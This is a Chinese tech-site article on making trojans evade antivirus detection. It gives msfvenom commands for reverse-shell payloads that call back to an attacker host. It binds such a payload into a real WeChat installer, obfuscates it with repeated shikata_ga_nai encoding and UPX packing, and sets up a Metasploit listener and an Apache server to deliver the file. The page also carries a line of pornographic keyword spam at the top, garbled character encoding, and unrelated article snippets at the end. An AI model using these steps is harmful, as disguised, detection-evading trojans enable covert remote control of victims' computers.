一区二区三区三上|欧美在线视频五区|国产午夜无码在线观看视频|亚洲国产裸体网站|无码成年人影视|亚洲AV亚洲AV|成人开心激情五月|欧美性爱内射视频|超碰人人干人人上|一区二区无码三区亚洲人区久久精品

0
  • 聊天消息
  • 系統(tǒng)消息
  • 評(píng)論與回復(fù)
登錄后你可以
  • 下載海量資料
  • 學(xué)習(xí)在線(xiàn)課程
  • 觀(guān)看技術(shù)視頻
  • 寫(xiě)文章/發(fā)帖/加入社區(qū)
會(huì)員中心
創(chuàng)作中心

完善資料讓更多小伙伴認(rèn)識(shí)你,還能領(lǐng)取20積分哦,立即完善>

3天內(nèi)不再提示

木馬免殺的幾種方式

馬哥Linux運(yùn)維 ? 來(lái)源:馬哥Linux運(yùn)維 ? 作者:馬哥Linux運(yùn)維 ? 2022-07-08 10:47 ? 次閱讀
加入交流群
微信小助手二維碼

掃碼添加小助手

加入工程師交流群

免殺,又叫免殺毒技術(shù),是反病毒,反間諜的對(duì)立面,是一種能使病毒或木馬免于被殺毒軟件查殺的軟件。它除了使病毒木馬免于被查殺外,還可以擴(kuò)增病毒木馬的功能,改變病毒木馬的行為。免殺的基本特征是破壞特征,有可能是行為特征,只要破壞了病毒與木馬所固有的特征,并保證其原有功能沒(méi)有改變,一次免殺就能完成了。免殺技術(shù)也并不是十惡不赦的,例如,在軟件保護(hù)所用的加密產(chǎn)品(比如殼)中,有一些會(huì)被殺毒軟件認(rèn)為是木馬病毒;一些安全領(lǐng)域中的部分安全檢測(cè)產(chǎn)品,也會(huì)被殺毒軟件誤殺,這時(shí)就需要免殺技術(shù)來(lái)應(yīng)對(duì)這些不穩(wěn)定因素。

1、裸奔馬的嘗試

意為不做任何免殺處理的木馬

1、使用msf的msfvenom生成木馬文件,生成一個(gè)裸奔馬,命名為 weixin.exe吧

命令:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.111.132 LPORT=8888 -f exe > weixin.exe

abf372ee-fdf9-11ec-ba43-dac502259ad0.jpg

2、部署一下kali上的apache服務(wù),令目標(biāo)機(jī)器能夠訪(fǎng)問(wèn)下載我們生成的木馬

2.1、kali中是自帶有apache的,啟動(dòng)apache服務(wù)

ac0b1098-fdf9-11ec-ba43-dac502259ad0.jpg

2.2、把生成的weixin.exe文件放在/var/www/html文件夾下

ac23dd8a-fdf9-11ec-ba43-dac502259ad0.jpg

2.3、在靶機(jī)下訪(fǎng)問(wèn)192.168.111.132/weinxin.exe,已經(jīng)下載

ac3774c6-fdf9-11ec-ba43-dac502259ad0.jpg

2.4、發(fā)現(xiàn)被AV查殺

ac4d0750-fdf9-11ec-ba43-dac502259ad0.jpg

ac5d624e-fdf9-11ec-ba43-dac502259ad0.jpg

如果在實(shí)戰(zhàn)中,直接投遞裸奔馬比較容易引起對(duì)方運(yùn)維人員的警覺(jué),這種方式也比較冒險(xiǎn),所以在投遞之前,要測(cè)試制作的木馬是否會(huì)引起相關(guān)AV的查殺,比如在在線(xiàn)多引擎病毒識(shí)別工具中去測(cè)試

2.5、這里po一個(gè)在線(xiàn)殺毒查殺的網(wǎng)站,virustotal是一個(gè)提供免費(fèi)的可疑文件分析服務(wù)的網(wǎng)站,它與傳統(tǒng)殺毒軟件的不同之處是它通過(guò)多種反病毒引擎掃描文件。使用多種反病毒引擎對(duì)您所上傳的文件進(jìn)行檢測(cè), 以判斷文件是否被病毒, 蠕蟲(chóng), 木馬, 以及各類(lèi)惡意軟件感染。

ac70f1a6-fdf9-11ec-ba43-dac502259ad0.jpg

2、MSF編碼

在metasploit框架下免殺的方式之一是msf編碼器,功能是使用msf編碼器對(duì)我們制作的木馬進(jìn)行重新編碼,生成一個(gè)二進(jìn)制文件,這個(gè)文件運(yùn)行后,msf編碼器會(huì)將原始程序解碼到內(nèi)存中并執(zhí)行。

1、在kali終端輸入 msfvenom -l encoders,這可以列出所有可用的編碼格式

ac8cc3e0-fdf9-11ec-ba43-dac502259ad0.jpg

2、在msf的/data/templates/下有很多metasploit自帶的用于捆綁木馬的程序模板,這個(gè)模塊但是一些反病毒廠(chǎng)商關(guān)注的重點(diǎn),為了更好的實(shí)現(xiàn)免殺,我們需要自主選擇一個(gè)待捆綁程序。在這里選擇是真正的微信安裝包。(也有對(duì)裸奔馬進(jìn)行shikata_ga_nai編碼饒AV的方法,但是shikata_ga_nai編碼技術(shù)多態(tài),每次生成的攻擊載荷文件都不一樣,有時(shí)生成的文件會(huì)被查殺,有時(shí)不會(huì),所以結(jié)合以上思路,生成一個(gè)捆綁木馬,并進(jìn)行shikata_ga_nai編碼)

aca4ddc2-fdf9-11ec-ba43-dac502259ad0.jpg

把微信安裝包放在/root文件夾下

acbae414-fdf9-11ec-ba43-dac502259ad0.jpg

3、使用msfvenom生成一個(gè)Windows環(huán)境下的木馬,并捆綁到WeChatSetup.exe上生成WeChatSetup1.exe的合成馬,同時(shí)對(duì)木馬進(jìn)行x86/shikata_ga_nai進(jìn)行多次編碼的方式進(jìn)行免殺處理。

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.111.132 LPORT=9999 -e x86/shikata_ga_nai -x WeChatSetup.exe -i 12 -f exe -o /root/WeChatSetup1.exe

acd4c0dc-fdf9-11ec-ba43-dac502259ad0.jpg

參數(shù)說(shuō)明:

-e /指定編碼方式對(duì)攻擊載荷進(jìn)行重新編碼

-x /指定木馬捆綁在哪個(gè)可執(zhí)行程序模板上

-i /指定對(duì)目標(biāo)進(jìn)行編碼的次數(shù),多次編碼理論上有助于免殺的實(shí)現(xiàn)

-f /指定msf編碼器輸出程序的格式

-0 /指定處理完畢后的文件輸出路徑

4、把生成的文件放在kali中的apache服務(wù)對(duì)應(yīng)的文件夾下,令攻擊機(jī)訪(fǎng)問(wèn)

aceb1e7c-fdf9-11ec-ba43-dac502259ad0.jpg

5、攻擊機(jī)下載后,在msf上創(chuàng)建監(jiān)聽(tīng)

use exploit/multi/handler

set payload windows/shell/reverse_tcp ///選擇payload為Windows/shell/reverse_tcp

show options ///查看一下哪些選項(xiàng)需要配置

set lhost 192.168.111.132 ///設(shè)置一下主機(jī)地址

set lport 9999 ///設(shè)置下主機(jī)端口,為木馬設(shè)定的端口

run

ad0360e0-fdf9-11ec-ba43-dac502259ad0.jpg

6、在目標(biāo)機(jī)器上點(diǎn)擊偽造的安裝包,沒(méi)有打開(kāi),因?yàn)槔壞抉R并多次編碼后,安裝包源文件已經(jīng)損壞,但是在攻擊機(jī)的,目標(biāo)機(jī)器已經(jīng)上線(xiàn)

ad16150a-fdf9-11ec-ba43-dac502259ad0.jpg

3、UPX加殼

upx打包器有兩種功能,一種叫做給程序加殼,一種叫壓縮程序,在這里使用打包器的目的是改變后門(mén)程序的特征碼。

壓縮的時(shí)候:它首先可執(zhí)行文件中的可執(zhí)行數(shù)據(jù)解壓出來(lái),然后將解壓縮用的代碼附加在前面

運(yùn)行的時(shí)候:將原本的可執(zhí)行數(shù)據(jù)解壓出來(lái),然后再運(yùn)行解壓縮后的數(shù)據(jù)

1、在kali中內(nèi)置了upx打包器,輸入upx可以看下參數(shù)介紹

ad3097ea-fdf9-11ec-ba43-dac502259ad0.jpg

2、簡(jiǎn)單的命令就是直接upx file,對(duì)file文件進(jìn)行加殼處理,加殼后,因?yàn)榻?jīng)過(guò)壓縮,文件大小會(huì)變小

ad5161e6-fdf9-11ec-ba43-dac502259ad0.jpg

3、還是老樣子,把上面經(jīng)歷過(guò)編碼后,又加殼的weixin安裝包放在apache服務(wù)的文件夾下,供目標(biāo)機(jī)器讀取下載(如上2.4)

ad6f17cc-fdf9-11ec-ba43-dac502259ad0.jpg

4、在msf上可以創(chuàng)建正常的連接和監(jiān)聽(tīng),成功傳回

ad9fade2-fdf9-11ec-ba43-dac502259ad0.jpg

后言

免殺技術(shù)也被安全技術(shù)廠(chǎng)商盯上并開(kāi)發(fā)相對(duì)應(yīng)的檢測(cè)技術(shù),所以免殺技術(shù)與殺軟技術(shù)是互相促進(jìn)發(fā)展的,而且發(fā)展速度很快,有些現(xiàn)在可以測(cè)試成功的殺軟技術(shù),過(guò)段時(shí)間就不能用了。免殺技術(shù)還需要狠下功夫去研究,接下來(lái)也會(huì)嘗試python,GO寫(xiě)的免殺,也會(huì)在后續(xù)文章中敘述進(jìn)展!

審核編輯 :李倩

聲明:本文內(nèi)容及配圖由入駐作者撰寫(xiě)或者入駐合作網(wǎng)站授權(quán)轉(zhuǎn)載。文章觀(guān)點(diǎn)僅代表作者本人,不代表電子發(fā)燒友網(wǎng)立場(chǎng)。文章及其配圖僅供工程師學(xué)習(xí)之用,如有內(nèi)容侵權(quán)或者其他違規(guī)問(wèn)題,請(qǐng)聯(lián)系本站處理。 舉報(bào)投訴
  • 編碼器
    +關(guān)注

    關(guān)注

    45

    文章

    3808

    瀏覽量

    138079
  • 木馬
    +關(guān)注

    關(guān)注

    0

    文章

    47

    瀏覽量

    13543
  • 模板
    +關(guān)注

    關(guān)注

    0

    文章

    109

    瀏覽量

    20872

原文標(biāo)題:滲透測(cè)試-木馬免殺的幾種方式

文章出處:【微信號(hào):magedu-Linux,微信公眾號(hào):馬哥Linux運(yùn)維】歡迎添加關(guān)注!文章轉(zhuǎn)載請(qǐng)注明出處。

收藏 人收藏
加入交流群
微信小助手二維碼

掃碼添加小助手

加入工程師交流群

    評(píng)論

    相關(guān)推薦
    熱點(diǎn)推薦

    光纖預(yù)端接方式幾種

    光纖預(yù)端接方式主要包括以下幾種,每種方式都有其獨(dú)特的特點(diǎn)和應(yīng)用場(chǎng)景: 工廠(chǎng)預(yù)端接(Factory Pre-terminated) 特點(diǎn):在工廠(chǎng)環(huán)境下,通過(guò)高精度設(shè)備將光纖連接器(如LC、SC、MPO
    的頭像 發(fā)表于 05-13 14:13 ?252次閱讀

    打配線(xiàn)架好還是模塊好

    打配線(xiàn)架和模塊化配線(xiàn)架各有優(yōu)劣,選擇需根據(jù)具體需求和場(chǎng)景決定。以下是對(duì)兩者的詳細(xì)比較: 打配線(xiàn)架的優(yōu)勢(shì) 操作便捷:打配線(xiàn)架無(wú)需使用網(wǎng)線(xiàn)鉗壓接,操作快捷方便。即使打錯(cuò)線(xiàn),也可以移除重新打線(xiàn),降低
    的頭像 發(fā)表于 05-12 10:19 ?233次閱讀

    STM32的幾種開(kāi)發(fā)方式,你都知道嗎?(可下載)

    經(jīng)常有人會(huì)問(wèn),你們 STM32 編程是用庫(kù)函數(shù) 還是用寄存器的...會(huì)說(shuō)庫(kù)函數(shù)方便,容 易,都用庫(kù)函數(shù)...等等這樣的問(wèn)題,今天我們就來(lái) dis 一下這幾種編程方式,STM32 編程 目前常見(jiàn)的幾種
    發(fā)表于 04-03 11:24 ?0次下載

    工業(yè)機(jī)器人4大控制方式,你知道幾種

    方式和智能控制方式四種,這幾種控制方式的功能要點(diǎn)有哪些。 智慧倉(cāng)儲(chǔ)物流 01 點(diǎn)位控制方式(PTP) 這種控制
    的頭像 發(fā)表于 03-13 10:11 ?793次閱讀
    工業(yè)機(jī)器人4大控制<b class='flag-5'>方式</b>,你知道<b class='flag-5'>幾種</b>?

    積分電機(jī)資料合集8

    積分下載,強(qiáng)烈建議下載收藏以備不時(shí)之需~~~
    發(fā)表于 03-11 17:18

    常見(jiàn)網(wǎng)絡(luò)負(fù)載均衡的幾種方式

    常見(jiàn)網(wǎng)絡(luò)負(fù)載均衡的幾種方式包括:DNS負(fù)載均衡、反向代理負(fù)載均衡、IP負(fù)載均衡、應(yīng)用層負(fù)載均衡、鏈路層負(fù)載均衡。以下是小編對(duì)幾種常見(jiàn)的網(wǎng)絡(luò)負(fù)載均衡方式及其詳細(xì)展開(kāi)介紹。
    的頭像 發(fā)表于 03-06 11:14 ?539次閱讀

    電動(dòng)汽車(chē)高壓主動(dòng)放電幾種方式

    高壓主動(dòng)放電幾種方式,以及它們各自的工作原理、適用場(chǎng)景、必要性、實(shí)現(xiàn)方式、提升電動(dòng)汽車(chē)安全性能方面的作用。 目錄1.?主動(dòng)放電的基本概念 1.1 什么是高壓主動(dòng)放電? 1.2 為什么需要高壓主動(dòng)放電? 1.3 ?高壓主動(dòng)放電的基
    的頭像 發(fā)表于 01-02 11:39 ?2300次閱讀
    電動(dòng)汽車(chē)高壓主動(dòng)放電<b class='flag-5'>幾種</b><b class='flag-5'>方式</b>

    SF6密度傳感器焊接螺絲壓緊5芯航空插頭

    ?SF6密度傳感器焊接螺絲壓緊5芯航空插頭是一種應(yīng)用于SF6氣體監(jiān)測(cè)設(shè)備的連接部件,它采用焊接、螺絲壓緊的技術(shù),具有5芯的設(shè)計(jì)?。 5芯航空插頭?焊接設(shè)計(jì)?:傳統(tǒng)的航空插頭往往采用焊接
    的頭像 發(fā)表于 12-31 11:43 ?429次閱讀
    SF6密度傳感器<b class='flag-5'>免</b>焊接螺絲壓緊5芯航空插頭

    n母接頭的安裝方式有哪幾種

    等多個(gè)領(lǐng)域得到了廣泛應(yīng)用。關(guān)于N型母接頭的安裝方式,雖然具體的安裝步驟可能因產(chǎn)品型號(hào)和制造商的不同而有所差異,但通常可以歸納為以下幾種主要方式:  這是N型母接
    的頭像 發(fā)表于 11-13 09:23 ?1922次閱讀
    n母接頭的安裝<b class='flag-5'>方式</b>有哪<b class='flag-5'>幾種</b>

    光伏調(diào)節(jié)器接線(xiàn)方式幾種

    光伏調(diào)節(jié)器(通常也被稱(chēng)為光伏控制器)的接線(xiàn)方式主要涉及到與光伏板、電池組、負(fù)載以及其他可能設(shè)備的連接。雖然具體的接線(xiàn)方式可能因不同的光伏控制器型號(hào)和系統(tǒng)設(shè)計(jì)而有所差異,但一般來(lái)說(shuō),光伏控制器的接線(xiàn)方式可以歸納為以下
    的頭像 發(fā)表于 10-01 15:58 ?1630次閱讀

    新加坡服務(wù)器如何實(shí)現(xiàn)備案?

     新加坡服務(wù)器的備案特性主要得益于其地理位置、網(wǎng)絡(luò)架構(gòu)以及政策環(huán)境。以下是對(duì)新加坡服務(wù)器實(shí)現(xiàn)備案的具體原因分析,rak小編為您整理發(fā)布。
    的頭像 發(fā)表于 09-24 10:26 ?344次閱讀

    室內(nèi)北斗定位系統(tǒng)常用的幾種定位方式

    隨著科技的不斷進(jìn)步,室內(nèi)定位技術(shù)日益成熟,為人們的日常生活和工作帶來(lái)了極大的便利。特別是在室內(nèi)環(huán)境中,北斗衛(wèi)星定位系統(tǒng)通過(guò)一系列創(chuàng)新技術(shù),實(shí)現(xiàn)了高精度、高可靠的定位服務(wù)。接下來(lái)就由深圳滄穹科技給大家具體介紹室內(nèi)北斗定位系統(tǒng)常用的幾種定位方式。
    的頭像 發(fā)表于 09-23 10:00 ?1324次閱讀

    工業(yè)機(jī)器人控制方式幾種

    工業(yè)機(jī)器人的控制方式多種多樣,這些方式根據(jù)作業(yè)任務(wù)的不同而有所區(qū)別。主要可以分為以下幾種:點(diǎn)位控制方式、連續(xù)軌跡控制方式、力(力矩)控制
    的頭像 發(fā)表于 09-04 09:31 ?2433次閱讀

    bnc母頭法蘭的安裝幾種方式

      德索工程師說(shuō)道BNC母頭法蘭的安裝方式通常根據(jù)具體的應(yīng)用場(chǎng)景和需求有所不同,但一般可以分為以下幾種常見(jiàn)方式:   這種安裝方式簡(jiǎn)單快捷,不需要復(fù)雜的焊接工藝。   通過(guò)
    的頭像 發(fā)表于 08-17 09:26 ?1087次閱讀
    bnc母頭法蘭的安裝<b class='flag-5'>幾種</b><b class='flag-5'>方式</b>

    LED恒流驅(qū)動(dòng)芯片常用的幾種主流調(diào)光方式

    LED恒流驅(qū)動(dòng)芯片常用的幾種主流調(diào)光方式包括:PWM調(diào)光、模擬電壓調(diào)光和數(shù)字總線(xiàn)調(diào)光,開(kāi)關(guān)調(diào)光。? 下面是它們的比較:? 1.PWM調(diào)光: PWM(Pulse Width Modulation)調(diào)光
    的頭像 發(fā)表于 08-12 10:17 ?4510次閱讀
    LED恒流驅(qū)動(dòng)芯片常用的<b class='flag-5'>幾種</b>主流調(diào)光<b class='flag-5'>方式</b>